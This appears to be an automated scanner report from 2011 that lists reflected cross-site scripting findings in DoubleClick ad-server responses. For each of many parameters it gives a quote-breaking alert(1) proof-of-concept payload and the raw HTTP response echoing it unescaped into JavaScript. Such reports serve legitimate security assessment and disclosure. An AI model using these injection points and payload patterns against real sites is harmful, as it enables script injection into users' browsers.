document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Apr 04 07:35:43 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn. ...[SNIP]... gif"; var minV = 9; var FWH = ' width="300" height="125" '; var url = escape("http://wrapper.g.REDACTED.com/GRedirect.aspx?g.REDACTED.com/2AD00042/55000000000042726.1?!&&PID=8197329&UIT=G&TargetID=109283854e918"-alert(1)-"98486586506&AN=2017002340&PG=AUBEEN&ASID=97866bc3bc534483a55e34973920acb3&destination=http://ad.au.doubleclick.net/6k%3Bh%3Dv8/3afb/17/dc/%2a/f%3B240447302%3B0-0%3B0%3B57764189%3B367-300/125%3B41536959/41554746/1 ...[SNIP]...
The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload efee8'-alert(1)-'f5fd40e0f0a was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 02 May 2011 12:53:15 GMT Content-Length: 6343
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Apr 04 07:35:43 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn. ...[SNIP]... <a target=\"_blank\" href=\"http://wrapper.g.REDACTED.com/GRedirect.aspx?g.REDACTED.com/2AD00042/55000000000042726.1?!&&PID=8197329&UIT=G&TargetID=10928385efee8'-alert(1)-'f5fd40e0f0a&AN=2017002340&PG=AUBEEN&ASID=97866bc3bc534483a55e34973920acb3&destination=http://ad.au.doubleclick.net/6k%3Bh%3Dv8/3afb/17/dc/%2a/f%3B240447302%3B0-0%3B0%3B57764189%3B367-300/125%3B41536959/41554746/1 ...[SNIP]...
The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 59df8'-alert(1)-'0d6f83edabc was submitted in the UIT parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 02 May 2011 12:53:05 GMT Content-Length: 6343
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Apr 04 07:35:43 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn. ...[SNIP]... <a target=\"_blank\" href=\"http://wrapper.g.REDACTED.com/GRedirect.aspx?g.REDACTED.com/2AD00042/55000000000042726.1?!&&PID=8197329&UIT=G59df8'-alert(1)-'0d6f83edabc&TargetID=10928385&AN=2017002340&PG=AUBEEN&ASID=97866bc3bc534483a55e34973920acb3&destination=http://ad.au.doubleclick.net/6k%3Bh%3Dv8/3afb/17/dc/%2a/f%3B240447302%3B0-0%3B0%3B57764189%3B367-300/125%3B4 ...[SNIP]...
The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4cfc7"-alert(1)-"93944cc2a03 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 02 May 2011 12:53:00 GMT Content-Length: 6343
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Apr 04 07:35:43 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn. ...[SNIP]... 300x125_14Mar2011.gif"; var minV = 9; var FWH = ' width="300" height="125" '; var url = escape("http://wrapper.g.REDACTED.com/GRedirect.aspx?g.REDACTED.com/2AD00042/55000000000042726.1?!&&PID=8197329&UIT=G4cfc7"-alert(1)-"93944cc2a03&TargetID=10928385&AN=2017002340&PG=AUBEEN&ASID=97866bc3bc534483a55e34973920acb3&destination=http://ad.au.doubleclick.net/6k%3Bh%3Dv8/3afb/17/dc/%2a/f%3B240447302%3B0-0%3B0%3B57764189%3B367-300/125%3B4 ...[SNIP]...
The value of the destination request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3dc69"-alert(1)-"b1724e75ee9 was submitted in the destination parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6343 Cache-Control: no-cache Pragma: no-cache Date: Mon, 02 May 2011 12:53:50 GMT Expires: Mon, 02 May 2011 12:53:50 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Apr 04 07:35:43 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn. ...[SNIP]... escape("http://wrapper.g.REDACTED.com/GRedirect.aspx?g.REDACTED.com/2AD00042/55000000000042726.1?!&&PID=8197329&UIT=G&TargetID=10928385&AN=2017002340&PG=AUBEEN&ASID=97866bc3bc534483a55e34973920acb3&destination=3dc69"-alert(1)-"b1724e75ee9http://ad.au.doubleclick.net/6k%3Bh%3Dv8/3afb/17/dc/%2a/f%3B240447302%3B0-0%3B0%3B57764189%3B367-300/125%3B41536959/41554746/1%3B%3B%7Esscs%3D%3fhttp://www.bmw.com.au/com/en/newvehicles/x/x3/2010/showr ...[SNIP]...
The value of the destination request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e382b'-alert(1)-'c8d54a88246 was submitted in the destination parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6343 Cache-Control: no-cache Pragma: no-cache Date: Mon, 02 May 2011 12:53:55 GMT Expires: Mon, 02 May 2011 12:53:55 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Apr 04 07:35:43 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn. ...[SNIP]... " href=\"http://wrapper.g.REDACTED.com/GRedirect.aspx?g.REDACTED.com/2AD00042/55000000000042726.1?!&&PID=8197329&UIT=G&TargetID=10928385&AN=2017002340&PG=AUBEEN&ASID=97866bc3bc534483a55e34973920acb3&destination=e382b'-alert(1)-'c8d54a88246http://ad.au.doubleclick.net/6k%3Bh%3Dv8/3afb/17/dc/%2a/f%3B240447302%3B0-0%3B0%3B57764189%3B367-300/125%3B41536959/41554746/1%3B%3B%7Esscs%3D%3fhttp://www.bmw.com.au/com/en/newvehicles/x/x3/2010/showr ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d1af9'-alert(1)-'24059d22b80 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 02 May 2011 12:52:04 GMT Content-Length: 6343
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Apr 04 07:35:43 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn. ...[SNIP]... <a target=\"_blank\" href=\"http://wrapper.g.REDACTED.com/GRedirect.aspx?g.REDACTED.com/2AD00042/55000000000042726.1?!d1af9'-alert(1)-'24059d22b80&&PID=8197329&UIT=G&TargetID=10928385&AN=2017002340&PG=AUBEEN&ASID=97866bc3bc534483a55e34973920acb3&destination=http://ad.au.doubleclick.net/6k%3Bh%3Dv8/3afb/17/dc/%2a/f%3B240447302%3B0-0%3B0%3B5776418 ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c9f0d"-alert(1)-"8875c28e870 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 02 May 2011 12:51:59 GMT Content-Length: 6343
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Apr 04 07:35:43 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn. ...[SNIP]... et/376153/3-BMW_X3_300x125_14Mar2011.gif"; var minV = 9; var FWH = ' width="300" height="125" '; var url = escape("http://wrapper.g.REDACTED.com/GRedirect.aspx?g.REDACTED.com/2AD00042/55000000000042726.1?!c9f0d"-alert(1)-"8875c28e870&&PID=8197329&UIT=G&TargetID=10928385&AN=2017002340&PG=AUBEEN&ASID=97866bc3bc534483a55e34973920acb3&destination=http://ad.au.doubleclick.net/6k%3Bh%3Dv8/3afb/17/dc/%2a/f%3B240447302%3B0-0%3B0%3B5776418 ...[SNIP]...
The value of the campID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4e39a"-alert(1)-"8d72fc9941b was submitted in the campID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 02 May 2011 12:49:54 GMT Content-Length: 9062
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... AAA=,,http%3A%2F%2Fwww.theage.com.au%2Fnational%2Fchristmas-island-action-adds-to-villawood-woes-20110425-1du6x.html,$http://t.invitemedia.com/track_click?auctionID=1304340341814544-110847&campID=803404e39a"-alert(1)-"8d72fc9941b&crID=110847&pubICode=1662910&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Etheage%2Ecom%2Eau%2Fnational%2Fchristmas%2Disland%2Daction%2Dadds%2Dto%2Dvillawood%2Dwoes%2D20110425%2D1du6x%2Ehtml&redirectU ...[SNIP]...
The value of the crID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3689a"-alert(1)-"6360c3aeebe was submitted in the crID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 02 May 2011 12:50:04 GMT Content-Length: 9062
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... A%2F%2Fwww.theage.com.au%2Fnational%2Fchristmas-island-action-adds-to-villawood-woes-20110425-1du6x.html,$http://t.invitemedia.com/track_click?auctionID=1304340341814544-110847&campID=80340&crID=1108473689a"-alert(1)-"6360c3aeebe&pubICode=1662910&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Etheage%2Ecom%2Eau%2Fnational%2Fchristmas%2Disland%2Daction%2Dadds%2Dto%2Dvillawood%2Dwoes%2D20110425%2D1du6x%2Ehtml&redirectURL=http%3a%2 ...[SNIP]...
The value of the partnerID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4274"-alert(1)-"6749e576522 was submitted in the partnerID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 02 May 2011 12:50:42 GMT Content-Length: 9062
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... ristmas-island-action-adds-to-villawood-woes-20110425-1du6x.html,$http://t.invitemedia.com/track_click?auctionID=1304340341814544-110847&campID=80340&crID=110847&pubICode=1662910&pub=256078&partnerID=9f4274"-alert(1)-"6749e576522&url=http%3A%2F%2Fwww%2Etheage%2Ecom%2Eau%2Fnational%2Fchristmas%2Disland%2Daction%2Dadds%2Dto%2Dvillawood%2Dwoes%2D20110425%2D1du6x%2Ehtml&redirectURL=http%3a%2f%2fwww.tdameritrade.com/offer/250freetr ...[SNIP]...
The value of the pub request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8e70c"-alert(1)-"37993143f63 was submitted in the pub parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 02 May 2011 12:50:29 GMT Content-Length: 9062
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... ational%2Fchristmas-island-action-adds-to-villawood-woes-20110425-1du6x.html,$http://t.invitemedia.com/track_click?auctionID=1304340341814544-110847&campID=80340&crID=110847&pubICode=1662910&pub=2560788e70c"-alert(1)-"37993143f63&partnerID=9&url=http%3A%2F%2Fwww%2Etheage%2Ecom%2Eau%2Fnational%2Fchristmas%2Disland%2Daction%2Dadds%2Dto%2Dvillawood%2Dwoes%2D20110425%2D1du6x%2Ehtml&redirectURL=http%3a%2f%2fwww.tdameritrade.com/off ...[SNIP]...
The value of the pubICode request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ca208"-alert(1)-"8a30c001f0e was submitted in the pubICode parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 02 May 2011 12:50:17 GMT Content-Length: 9062
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... .com.au%2Fnational%2Fchristmas-island-action-adds-to-villawood-woes-20110425-1du6x.html,$http://t.invitemedia.com/track_click?auctionID=1304340341814544-110847&campID=80340&crID=110847&pubICode=1662910ca208"-alert(1)-"8a30c001f0e&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Etheage%2Ecom%2Eau%2Fnational%2Fchristmas%2Disland%2Daction%2Dadds%2Dto%2Dvillawood%2Dwoes%2D20110425%2D1du6x%2Ehtml&redirectURL=http%3a%2f%2fwww.tdameritr ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6a270"-alert(1)-"84104877d0e was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 02 May 2011 12:49:41 GMT Content-Length: 9062
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... zN2VmNQA4nyoAAAA=,,http%3A%2F%2Fwww.theage.com.au%2Fnational%2Fchristmas-island-action-adds-to-villawood-woes-20110425-1du6x.html,$http://t.invitemedia.com/track_click?auctionID=1304340341814544-1108476a270"-alert(1)-"84104877d0e&campID=80340&crID=110847&pubICode=1662910&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Etheage%2Ecom%2Eau%2Fnational%2Fchristmas%2Disland%2Daction%2Dadds%2Dto%2Dvillawood%2Dwoes%2D20110425%2D1du6x%2Eh ...[SNIP]...
The value of the url request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8a0b7"-alert(1)-"69532c69136 was submitted in the url parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 02 May 2011 12:50:56 GMT Content-Length: 9062
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... mpID=80340&crID=110847&pubICode=1662910&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Etheage%2Ecom%2Eau%2Fnational%2Fchristmas%2Disland%2Daction%2Dadds%2Dto%2Dvillawood%2Dwoes%2D20110425%2D1du6x%2Ehtml8a0b7"-alert(1)-"69532c69136&redirectURL=http%3a%2f%2fwww.tdameritrade.com/offer/250freetrades/%3Fa%3DGVQ%26o%3D199%26cid%3DGENRET%3B877237%3B62579218%3B239944197%3B41633480"); var fscUrl = url; var fscUrlClickTagFound = fals ...[SNIP]...
The value of the campID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c1445"-alert(1)-"98a4c2b7cc0 was submitted in the campID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 02 May 2011 12:50:41 GMT Content-Length: 9287
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... .com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340361814544-110787&campID=80340c1445"-alert(1)-"98a4c2b7cc0&crID=110787&pubICode=1662910&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer ...[SNIP]...
The value of the crID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5e83d"-alert(1)-"f2aef3fa5b7 was submitted in the crID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 02 May 2011 12:50:54 GMT Content-Length: 9287
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... inion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340361814544-110787&campID=80340&crID=1107875e83d"-alert(1)-"f2aef3fa5b7&pubICode=1662910&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427% ...[SNIP]...
The value of the partnerID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 79bb7"-alert(1)-"19c0f79625f was submitted in the partnerID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 02 May 2011 12:51:28 GMT Content-Length: 9287
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... emporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340361814544-110787&campID=80340&crID=110787&pubICode=1662910&pub=256078&partnerID=979bb7"-alert(1)-"19c0f79625f&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427%2D1dwe3%2Ehtml&redirectURL=https%3a%2f%2 ...[SNIP]...
The value of the pub request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cd56c"-alert(1)-"d3ec9aaf18e was submitted in the pub parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 02 May 2011 12:51:18 GMT Content-Length: 9287
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... engreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340361814544-110787&campID=80340&crID=110787&pubICode=1662910&pub=256078cd56c"-alert(1)-"d3ec9aaf18e&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427%2D1dwe3%2Ehtml&redirectURL=h ...[SNIP]...
The value of the pubICode request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7a033"-alert(1)-"9d0261df748 was submitted in the pubICode parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 02 May 2011 12:51:08 GMT Content-Length: 9287
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... 2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340361814544-110787&campID=80340&crID=110787&pubICode=16629107a033"-alert(1)-"9d0261df748&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427%2D1dwe3%2Ehtml&re ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9511b"-alert(1)-"27fa9528383 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 02 May 2011 12:50:28 GMT Content-Length: 9287
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... brisbanetimes.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340361814544-1107879511b"-alert(1)-"27fa9528383&campID=80340&crID=110787&pubICode=1662910&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2 ...[SNIP]...
The value of the url request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d79bd"-alert(1)-"cf2b07c19b1 was submitted in the url parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 02 May 2011 12:51:38 GMT Content-Length: 9287
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... 910&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427%2D1dwe3%2Ehtmld79bd"-alert(1)-"cf2b07c19b1&redirectURL=https%3a%2f%2fwww.thinkorswim.com/tos/suiteFreedom/Asterplosion.tos%3Fa%3DIVM%26%26cid%3DGENRET%3B877237%3B62579852%3B239944841%3B39988934"); var fscUrl = url; var fscUrlClickTagFound = ...[SNIP]...
The value of the campID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c6cf3"-alert(1)-"1cadb0e3ce6 was submitted in the campID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 02 May 2011 12:50:51 GMT Content-Length: 9315
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... .com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340365814544-110774&campID=80340c6cf3"-alert(1)-"1cadb0e3ce6&crID=110774&pubICode=1662910&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer ...[SNIP]...
The value of the crID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a84e2"-alert(1)-"9a3c17528a7 was submitted in the crID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 02 May 2011 12:51:05 GMT Content-Length: 9315
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... inion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340365814544-110774&campID=80340&crID=110774a84e2"-alert(1)-"9a3c17528a7&pubICode=1662910&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427% ...[SNIP]...
The value of the partnerID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b7d68"-alert(1)-"baa51e6d3e2 was submitted in the partnerID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 02 May 2011 12:51:36 GMT Content-Length: 9315
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... emporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340365814544-110774&campID=80340&crID=110774&pubICode=1662910&pub=256078&partnerID=9b7d68"-alert(1)-"baa51e6d3e2&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427%2D1dwe3%2Ehtml&redirectURL=https%3a%2f%2 ...[SNIP]...
The value of the pub request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c938b"-alert(1)-"d1206cc109e was submitted in the pub parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 02 May 2011 12:51:24 GMT Content-Length: 9315
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... engreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340365814544-110774&campID=80340&crID=110774&pubICode=1662910&pub=256078c938b"-alert(1)-"d1206cc109e&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427%2D1dwe3%2Ehtml&redirectURL=h ...[SNIP]...
